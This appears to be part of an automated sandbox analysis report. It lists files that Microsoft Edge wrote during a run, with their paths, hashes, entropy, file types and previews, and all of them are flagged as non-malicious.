                                                                                                                                                                                                                                                                                                Preview:0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):189113
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.386179898505786
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:pCoMNEGdawDA0ozm44L/EmTDDNRv0xPmbexfXUr6LX:MawDSzmL/THDQxH7X
                                                                                                                                                                                                                                                                                                MD5:66172EAB07F0506615B930D79E8D5989
                                                                                                                                                                                                                                                                                                SHA1:1306030F10EE0886F11D40065C374F0DFD72D457
                                                                                                                                                                                                                                                                                                SHA-256:B8EF9FCD4E3D00B1C744536E299C64C2FFE89AA1237C331E02B077F654388A23
                                                                                                                                                                                                                                                                                                SHA-512:9493BDC8E32580006F2178B385639B6802A0301048151C5B3F5AB29E9D0CEAF9E48F7AA15211099AC6C9042748D80561893D744E4B5C0B8AA3BCC6FB24747065
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:0\r..m..........rSG.....0...../...............R.......yT`........,T.8..`,.....L`.....,T...`......L`......Rc>.,.....exports...Rc........module....Rc.3.F....define....Rb2S......amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H........Q....1.K{...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true.a........Db............D`.....E..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da....@[...,T.`.`z.....L`..........a............a.........Dr8..............

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):24
                                                                                                                                                                                                                                                                                                Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                                                                MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                                                                SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                                                                SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                                                                SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:0\r..m..................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):72
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.5931902015385067
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:ZIYuAyXl/lYV/lxEstllQ5S+:2YPKYWs+Q+
                                                                                                                                                                                                                                                                                                MD5:14956A7816A25FC4580455373C148CB0
                                                                                                                                                                                                                                                                                                SHA1:03969A6C2D61B1FFCCCCE81ACE164D1A9BDF5C61
                                                                                                                                                                                                                                                                                                SHA-256:206D808416DA5D2F16FD726971BFC530FBB68DBEDC9242D388321EE13C9DECDC
                                                                                                                                                                                                                                                                                                SHA-512:E491FDB865B7BD790B083EC2E3368C87302C67397D01575EE666A74B6E3354B134A0E9FE4839F55D7B3C3E22D6734E058E788376CA8CAB009A523C9D9D5D4034
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:@...l-u}oy retne.........................X....,....................D./.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):72
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.5931902015385067
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:ZIYuAyXl/lYV/lxEstllQ5S+:2YPKYWs+Q+
                                                                                                                                                                                                                                                                                                MD5:14956A7816A25FC4580455373C148CB0
                                                                                                                                                                                                                                                                                                SHA1:03969A6C2D61B1FFCCCCE81ACE164D1A9BDF5C61
                                                                                                                                                                                                                                                                                                SHA-256:206D808416DA5D2F16FD726971BFC530FBB68DBEDC9242D388321EE13C9DECDC
                                                                                                                                                                                                                                                                                                SHA-512:E491FDB865B7BD790B083EC2E3368C87302C67397D01575EE666A74B6E3354B134A0E9FE4839F55D7B3C3E22D6734E058E788376CA8CAB009A523C9D9D5D4034
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:@...l-u}oy retne.........................X....,....................D./.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF4565a.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):72
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.5931902015385067
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:ZIYuAyXl/lYV/lxEstllQ5S+:2YPKYWs+Q+
                                                                                                                                                                                                                                                                                                MD5:14956A7816A25FC4580455373C148CB0
                                                                                                                                                                                                                                                                                                SHA1:03969A6C2D61B1FFCCCCE81ACE164D1A9BDF5C61
                                                                                                                                                                                                                                                                                                SHA-256:206D808416DA5D2F16FD726971BFC530FBB68DBEDC9242D388321EE13C9DECDC
                                                                                                                                                                                                                                                                                                SHA-512:E491FDB865B7BD790B083EC2E3368C87302C67397D01575EE666A74B6E3354B134A0E9FE4839F55D7B3C3E22D6734E058E788376CA8CAB009A523C9D9D5D4034
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:@...l-u}oy retne.........................X....,....................D./.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):6577
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.3872650809150118
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:AEG3jN1BIsS39Xp+BKilDVLl9iSrY5Zh/t2:y3jN1+9Xp+MuLl9iSrEZZt2
                                                                                                                                                                                                                                                                                                MD5:F079B92B04CE8C7A73925CE38E2B7C77
                                                                                                                                                                                                                                                                                                SHA1:F20FB82C16902C58B63703004ECCB5EBE52D4AC6
                                                                                                                                                                                                                                                                                                SHA-256:96129BEC027D1D3B800D0FBC47132ED704BC35268E3AF765835C281C3BC09379
                                                                                                                                                                                                                                                                                                SHA-512:996037F60B5938B0BBB96B47740A911DEF0B06023702B9F530AFACF21DBB8F1DC7F0D19D9DC1723F00D575548C47F03211425DCA76C462B873A899D0C97E16F2
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f................c..b................next-map-id.1.Cnamespace-5059b7c5_bd54_441c_afb7_1f64b42e2923-https://ntp.msn.com/.0V.e................V.e................V.e................iu..l................map-0-shd_sweeper.0{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.c.o.m.p.o.f.,.p.r.g.-.f.i.n.-.h.p.o.f.l.i.o.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.p.r.g.-.1.s.w.-.c.c.-.c.a.l.f.e.e.d.i.c.,.b.i.n.g._.v.2._.s.c.o.p.e.,.p.r.g.-.1.s.w.-.s.a.b.g.t.a.s.k.t.h.r.o.t.c.,.p.r.g.-.1.s.w.-.s.a.c.f.x.2.t.3.,.p.r.g.-.1.s.w.-.s.a.u.i.d.r.m.t.2.,.p.r.g.-.1.s.w.-.s.a.-.s.p.6.-.t.2.f.,.p.r.g.-.1.s.w.-.c.-.c.h.a.n.g.e.s.i.z.e.,.p.r.g.-.1.s.w.-.n.o.r.e.t.r.y.,.p.r.g.-.1.s.w.-.t.m.u.i.d.s.y.n.c.r.f.w.o.e.r.r.,.p.r.g.-.1.s.w.-.r.e.f.r.e.s.h.p.,.p.r.g.-.1.s.w.-.t.m.u.i.d.1.s.s.y.n.c.,.1.s.-.n.t.f.1.-.f.g.d.i.p.1.,.1.s.-.n.t.f.1.-.n.w.t

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):328
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.037027747637703
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:P7KUrjyq2PN723oH+TcwtrQMxIFUt8I7YUrFz1Zmw+I79jlRkwON723oH+Tcwtrb:fjyvVaYebCFUt8/uZ/+MR5OaYebtJ
                                                                                                                                                                                                                                                                                                MD5:8EE005635A31A4E9FB0B2DA46D943125
                                                                                                                                                                                                                                                                                                SHA1:D706EE07814951524390034DDC077FDDF95B668E
                                                                                                                                                                                                                                                                                                SHA-256:DD694E300ED183C645A6FD9A691A1E4B720A5FCF53975B2E594263D83777E02B
                                                                                                                                                                                                                                                                                                SHA-512:27E0DCFF20F619039018E94B5840184D9FC9502A0CE7B42914172CCDE0D4C8E89AA0778C067882876BFFB68A5135548AD0B2EE043738348B2B60BC2F5A79A8AA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:32.201 1c74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/20-01:31:32.207 1c74 Recovering log #3.2024/12/20-01:31:32.212 1c74 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):328
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.037027747637703
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:P7KUrjyq2PN723oH+TcwtrQMxIFUt8I7YUrFz1Zmw+I79jlRkwON723oH+Tcwtrb:fjyvVaYebCFUt8/uZ/+MR5OaYebtJ
                                                                                                                                                                                                                                                                                                MD5:8EE005635A31A4E9FB0B2DA46D943125
                                                                                                                                                                                                                                                                                                SHA1:D706EE07814951524390034DDC077FDDF95B668E
                                                                                                                                                                                                                                                                                                SHA-256:DD694E300ED183C645A6FD9A691A1E4B720A5FCF53975B2E594263D83777E02B
                                                                                                                                                                                                                                                                                                SHA-512:27E0DCFF20F619039018E94B5840184D9FC9502A0CE7B42914172CCDE0D4C8E89AA0778C067882876BFFB68A5135548AD0B2EE043738348B2B60BC2F5A79A8AA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:32.201 1c74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/20-01:31:32.207 1c74 Recovering log #3.2024/12/20-01:31:32.212 1c74 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13379149893822046

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1443
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.8251420711408457
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:3wCPPQpsAF4unx0JtLp3X2amEtG1ChqKTG9BrbQKkOAM48:3jPPQzFkjLp2FEkChRTG9N0HOpL
                                                                                                                                                                                                                                                                                                MD5:9AE9A22F009882D208F7D6B5EA5B2154
                                                                                                                                                                                                                                                                                                SHA1:9CF3422967B08C32AAAE94C656CEFA28A08996AC
                                                                                                                                                                                                                                                                                                SHA-256:589F1F2FC47B5CD0B1EDE0F4368310195F598036FF5C86B39B7BD8D4A65DAECB
                                                                                                                                                                                                                                                                                                SHA-512:05C6CA603CBCE4B72937949A8A0507B4CB049F5F2D4A562910BFC432CA56DB203DEBF515F3465D08C49DA0F282C9961010893F18B6C75E7BC78A08C886727B7F
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SNSS........=.!............=.!......".=.!............=.!........=.!........=.!........=.!....!...=.!................................=.!.=.!1..,....=.!$...5059b7c5_bd54_441c_afb7_1f64b42e2923....=.!........=.!....(...........=.!....=.!........................=.!....................5..0....=.!&...{46F3A197-DB49-410A-81B3-94975C835573}......=.!........=.!...........................=.!............=.!........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x.........^.)....^.).................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                                                MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                                                SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                                                SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                                                SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):356
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.107246427230204
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:PDPeq2PN723oH+Tcwt7Uh2ghZIFUt8IDhZmw+ID7kwON723oH+Tcwt7Uh2gnLJ:bevVaYebIhHh2FUt8a/+m5OaYebIhHLJ
                                                                                                                                                                                                                                                                                                MD5:6449CF454224A8E706A5807345660715
                                                                                                                                                                                                                                                                                                SHA1:9C121025E24CFA14A14EEF7100DE820C5E78D507
                                                                                                                                                                                                                                                                                                SHA-256:10A093172AD12FE7E28DC7C798CA673157087A1EF87CBC8C88E976EB048B089C
                                                                                                                                                                                                                                                                                                SHA-512:13AFF6DF3ECE017D366BAD8AFAC7D42044C44C3D62792D60637753BFACD043F897B09D38E3BF9D3D34827EB999A73ACCAE600DAF951C2CE9AD2D629AC3B21B00
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:31.561 1d80 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/20-01:31:31.563 1d80 Recovering log #3.2024/12/20-01:31:31.563 1d80 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):356
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.107246427230204
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:PDPeq2PN723oH+Tcwt7Uh2ghZIFUt8IDhZmw+ID7kwON723oH+Tcwt7Uh2gnLJ:bevVaYebIhHh2FUt8a/+m5OaYebIhHLJ
                                                                                                                                                                                                                                                                                                MD5:6449CF454224A8E706A5807345660715
                                                                                                                                                                                                                                                                                                SHA1:9C121025E24CFA14A14EEF7100DE820C5E78D507
                                                                                                                                                                                                                                                                                                SHA-256:10A093172AD12FE7E28DC7C798CA673157087A1EF87CBC8C88E976EB048B089C
                                                                                                                                                                                                                                                                                                SHA-512:13AFF6DF3ECE017D366BAD8AFAC7D42044C44C3D62792D60637753BFACD043F897B09D38E3BF9D3D34827EB999A73ACCAE600DAF951C2CE9AD2D629AC3B21B00
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:31.561 1d80 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/20-01:31:31.563 1d80 Recovering log #3.2024/12/20-01:31:31.563 1d80 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):438
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.168478128212951
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:4FfvVaYebvqBQFUt8xWX/+x55OaYebvqBvJ:4JVaYebvZg8xWorOaYebvk
                                                                                                                                                                                                                                                                                                MD5:52CE4532C7DC68608FC67F72467CFED5
                                                                                                                                                                                                                                                                                                SHA1:1ADF89AB525EE6659FC92FAF656E40AD59BE6B5D
                                                                                                                                                                                                                                                                                                SHA-256:EFF6A2A23E108C71A1052873FB7AF901ED49BAB4211BE14F596989CB356CE352
                                                                                                                                                                                                                                                                                                SHA-512:3EBC401D350DA90905BCE07B00DD29798E9560BCAE963343A5E49BF6F73CF1BE1F40D10424D0D2AA45F45E8C836AD0232CF5F0BE7DEB08232E18EA1600AE200D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:32.162 1c30 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/20-01:31:32.177 1c30 Recovering log #3.2024/12/20-01:31:32.192 1c30 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):438
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.168478128212951
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:4FfvVaYebvqBQFUt8xWX/+x55OaYebvqBvJ:4JVaYebvZg8xWorOaYebvk
                                                                                                                                                                                                                                                                                                MD5:52CE4532C7DC68608FC67F72467CFED5
                                                                                                                                                                                                                                                                                                SHA1:1ADF89AB525EE6659FC92FAF656E40AD59BE6B5D
                                                                                                                                                                                                                                                                                                SHA-256:EFF6A2A23E108C71A1052873FB7AF901ED49BAB4211BE14F596989CB356CE352
                                                                                                                                                                                                                                                                                                SHA-512:3EBC401D350DA90905BCE07B00DD29798E9560BCAE963343A5E49BF6F73CF1BE1F40D10424D0D2AA45F45E8C836AD0232CF5F0BE7DEB08232E18EA1600AE200D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:32.162 1c30 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/20-01:31:32.177 1c30 Recovering log #3.2024/12/20-01:31:32.192 1c30 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

